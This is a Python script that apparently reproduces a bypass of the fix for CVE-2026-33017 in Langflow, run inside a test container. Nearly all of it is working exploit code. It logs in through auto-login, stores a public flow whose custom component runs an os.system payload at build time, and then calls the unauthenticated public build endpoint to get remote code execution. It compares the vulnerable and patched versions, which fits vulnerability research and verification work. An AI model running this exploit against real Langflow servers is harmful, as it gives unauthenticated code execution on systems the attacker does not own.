#!/usr/bin/env python3
"""CVE-2026-33017 VARIANT/BYPASS exploit helper - runs INSIDE the langflow container.

Invoked by bundle/vuln_variant/reproduction_steps.sh via:
    docker exec -e ROLE=<role> -e TOKEN=<token> -e MODE=<mode> <container> \
        python3 /tmp/variant_attempt.py

Bypass strategy (defeats the v1.9.0 "fix"):
  The v1.9.0 fix for CVE-2026-33017 removed the client-supplied `data` parameter
  from POST /api/v1/build_public_tmp/{flow_id}/flow and hardcoded data=None so the
  public build loads the flow definition from the database. The only gate it added
  is validate_flow_for_current_settings(flow.data), which is a NO-OP under the
  default allow_custom_components=true. Therefore an attacker who can create a
  PUBLIC flow whose stored `data` carries a custom component with arbitrary code
  can still obtain unauthenticated RCE: the public build loads that stored
  (malicious) flow from the DB and exec()'s the node's `code` via
  prepare_global_scope()/eval_custom_component_code at graph-build time.

  This is exactly the gap the upstream follow-up commit
  626365f088 "fix(security): run trusted server code on unauthenticated public
  flow builds" (released in v1.10.1, NOT in v1.9.0) was issued to close.

MODE=bypass (default):
  1. Wait for /health
  2. GET /api/v1/auto_login  -> access_token (AUTO_LOGIN=true, no credentials)
  3. POST /api/v1/flows/      -> create a PUBLIC flow whose STORED data contains
     a CustomComponent node with a top-level `_rce = os.system(...)` payload
  4. POST /api/v1/build_public_tmp/{flow_id}/flow with only a client_id cookie
     and NO `data` in the body (the server loads the stored malicious flow)
  5. Poll for /tmp/rce-proof and emit a JSON result on stdout

Expected:
  - langflow 1.9.0 (CVE "fixed" version): proof written  -> BYPASS CONFIRMED
  - langflow 1.10.1 (follow-up fix):      no proof / 400  -> closed (control)
"""
import json
import os
import sys
import time
import urllib.error
import urllib.request

BASE = "http://127.0.0.1:7860"
TOKEN = os.environ.get("TOKEN", "variant")
ROLE = os.environ.get("ROLE", "vuln")
MODE = os.environ.get("MODE", "bypass")
PROOF = "/tmp/rce-proof"


def req(method, path, headers=None, body=None, timeout=30):
    url = BASE + path
    data = json.dumps(body).encode("utf-8") if body is not None else None
    r = urllib.request.Request(url, data=data, method=method, headers=headers or {})
    try:
        with urllib.request.urlopen(r, timeout=timeout) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as e:
        return e.code, e.read().decode("utf-8", "replace")
    except urllib.error.URLError as e:
        return 0, str(e)


def wait_health(timeout=240):
    deadline = time.time() + timeout
    while time.time() < deadline:
        try:
            st, _ = req("GET", "/health", timeout=10)
            if st == 200:
                return True
        except Exception:
            pass
        time.sleep(2)
    return False


def make_malicious_flow(token):
    """A flow with one CustomComponent node carrying a top-level os.system payload.

    The top-level assignment `_rce = os.system(...)` is an ast.Assign node which
    prepare_global_scope() collects and exec()'s at graph-build time, before any
    component method runs.
    """
    code = (
        "from langflow.custom import Component\n"
        "from langflow.io import MessageTextInput, Output\n"
        "from langflow.schema import Data\n"
        "import os\n"
        f"_rce = os.system(\"id > {PROOF} 2>&1 && echo 'RCE_CONFIRMED {token}' >> {PROOF}\")\n"
        "\n"
        "class RCEComponent(Component):\n"
        '    display_name = "RCE Component"\n'
        '    description = "demo"\n'
        '    icon = "custom_components"\n'
        '    inputs = [MessageTextInput(name="input_value", display_name="Input")]\n'
        '    outputs = [Output(display_name="Output", name="output", method="build_output")]\n'
        "    def build_output(self) -> Data:\n"
        "        return Data(value=self.input_value)\n"
    )
    node = {
        "id": "CustomComponent-rce-1",
        "type": "CustomComponent",
        "data": {
            "id": "CustomComponent-rce-1",
            "type": "RCEComponent",
            "node": {
                "base_classes": ["Data"],
                "display_name": "RCE Component",
                "description": "demo",
                "icon": "custom_components",
                "outputs": [
                    {
                        "display_name": "Output",
                        "name": "output",
                        "method": "build_output",
                        "types": ["Data"],
                        "cache": True,
                        "allows_loop": False,
                        "group_outputs": False,
                        "hidden": None,
                        "loop_types": None,
                        "options": None,
                        "required_inputs": None,
                        "selected": "Data",
                        "tool_mode": False,
                        "value": "__UNDEFINED__",
                    }
                ],
                "template": {
                    "_type": "Component",
                    "code": {
                        "type": "code",
                        "value": code,
                        "required": True,
                        "dynamic": True,
                        "show": True,
                        "advanced": True,
                        "multiline": True,
                        "name": "code",
                        "display_name": "Code",
                    },
                    "input_value": {
                        "_input_type": "MessageTextInput",
                        "type": "str",
                        "name": "input_value",
                        "display_name": "Input",
                        "value": "hello",
                        "required": False,
                        "show": True,
                    },
                },
            },
        },
    }
    return {"nodes": [node], "edges": []}


def main():
    result = {"role": ROLE, "mode": MODE, "token": TOKEN, "endpoint": "public_stored", "error": None}
    if os.path.exists(PROOF):
        os.remove(PROOF)

    if not wait_health():
        result["error"] = "health check failed"
        print(json.dumps(result))
        sys.exit(1)
    result["healthcheck_passed"] = True

    # 1. unauthenticated auto-login (AUTO_LOGIN=true issues a superuser session)
    st, body = req("GET", "/api/v1/auto_login")
    result["auto_login_status"] = st
    if st != 200:
        result["error"] = f"auto_login failed: {body[:200]}"
        print(json.dumps(result))
        sys.exit(1)
    access_token = json.loads(body).get("access_token")
    if not access_token:
        result["error"] = "no access_token in auto_login response"
        print(json.dumps(result))
        sys.exit(1)
    result["access_token"] = True
    auth = {"Authorization": f"Bearer {access_token}", "Content-Type": "application/json"}

    # 2. Create a PUBLIC flow whose STORED data contains the malicious custom
    #    component. This is the bypass: the malicious code lives in the DB, not in
    #    the build request. (v1.9.0 create_flow stores flow.data without any
    #    custom-component validation.)
    malicious_graph = make_malicious_flow(TOKEN)
    flow_body = {
        "name": f"bypass-flow-{TOKEN}",
        "data": malicious_graph,
        "access_type": "PUBLIC",
    }
    st, body = req("POST", "/api/v1/flows/", headers=auth, body=flow_body)
    result["create_flow_status"] = st
    if st not in (200, 201):
        result["error"] = f"create_flow failed: {body[:300]}"
        print(json.dumps(result))
        sys.exit(1)
    flow_id = json.loads(body).get("id")
    if not flow_id:
        result["error"] = f"no flow id: {body[:300]}"
        print(json.dumps(result))
        sys.exit(1)
    result["flow_id"] = flow_id

    # 3. Trigger the unauthenticated public build with ONLY a client_id cookie and
    #    NO `data` in the body. The server loads the stored (malicious) flow from
    #    the DB and exec()'s the node code at graph-build time.
    exploit_headers = {"Content-Type": "application/json", "Cookie": f"client_id={TOKEN}"}
    st, body = req("POST", f"/api/v1/build_public_tmp/{flow_id}/flow", headers=exploit_headers, body={})
    result["exploit_status"] = st
    result["exploit_body"] = body[:500]

    # 4. Poll for the proof file written by os.system() inside the container.
    proof_exists = False
    proof_content = None
    for _ in range(30):
        if os.path.exists(PROOF):
            proof_exists = True
            proof_content = open(PROOF).read().strip()
            break
        time.sleep(1)
    result["proof_exists"] = proof_exists
    result["proof_content"] = proof_content
    result["success"] = bool(proof_exists and TOKEN in (proof_content or ""))
    print(json.dumps(result))
    sys.exit(0 if result["success"] else 1)


if __name__ == "__main__":
    main()
